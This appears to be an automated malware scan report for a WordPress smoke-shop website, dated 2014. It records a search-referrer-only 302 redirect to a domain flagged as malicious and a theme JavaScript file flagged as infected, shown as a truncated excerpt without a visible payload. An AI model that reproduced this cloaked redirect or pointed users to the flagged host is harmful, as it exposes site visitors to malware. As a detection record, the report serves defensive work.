Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://elabsmokeshop.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: elabsmokeshop.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Sat, 27 Sep 2014 18:34:39 GMT Location: http://hinia.zyns.com/ Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.2.17 | malicious |
Scanned pages/files
Request | Server response | Status |
http://elabsmokeshop.com/ | 200 OK Content-Length: 12321 Content-Type: text/html | clean |
http://elabsmokeshop.com/wp-includes/js/jquery/jquery.js?ver=1.10.2 | 200 OK Content-Length: 93085 Content-Type: application/x-javascript | clean |
http://elabsmokeshop.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/x-javascript | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js | 200 OK Content-Length: 57254 Content-Type: text/javascript | clean |
http://elabsmokeshop.com/wp-content/themes/elabTheme/js/jquery.easing.min.js | 200 OK Content-Length: 2585 Content-Type: application/x-javascript | clean |
http://elabsmokeshop.com/wp-content/themes/elabTheme/js/jquery.lavalamp.min.js | 200 OK Content-Length: 1878 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(a){a.fn.lavaLamp=function(b){b=a.extend({fx:"swing",speed:500,click:function(){return true},startItem:"no",autoReturn:true,returnDelay:0,setOnClick:true,homeTop:0,homeLeft:0,homeWidth:0,homeHeight:0,returnHome:false},b||{});return this.each(function(){var h=location.pathname+location.search+location.hash;var e=new Object;var d;var i;var f;var g;if(b.homeTop||b.homeLeft){f=a('<li class="homeLava selectedLava"></li>').css({left:b.homeLeft,top:b.homeTop,width:b.homeWidth,heigh Antivirus reports:
| ||
http://elabsmokeshop.com/wp-content/themes/elabTheme/js/easySlider1.7.js | 200 OK Content-Length: 5980 Content-Type: application/x-javascript | clean |
http://elabsmokeshop.com/wp-content/themes/elabTheme/js/cufon-yui.js | 200 OK Content-Length: 18626 Content-Type: application/x-javascript | clean |
http://elabsmokeshop.com/wp-content/themes/elabTheme/js/Anivers_400.font.js | 200 OK Content-Length: 63481 Content-Type: application/x-javascript | clean |
http://elabsmokeshop.com/wp-content/themes/elabTheme/js/jquery.prettyPhoto.js | 200 OK Content-Length: 22023 Content-Type: application/x-javascript | clean |
http://elabsmokeshop.com/the-shop | 200 OK Content-Length: 10815 Content-Type: text/html | clean |
http://elabsmokeshop.com/cigars | 200 OK Content-Length: 10879 Content-Type: text/html | clean |
http://elabsmokeshop.com/smokables | 200 OK Content-Length: 11215 Content-Type: text/html | clean |
http://elabsmokeshop.com/smoking-accessories | 200 OK Content-Length: 13263 Content-Type: text/html | clean |
http://elabsmokeshop.com/contact | 200 OK Content-Length: 13138 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=elabsmokeshop.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://elabsmokeshop.com/
Result: elabsmokeshop.com is not infected or malware details are not published yet.
Result: elabsmokeshop.com is not infected or malware details are not published yet.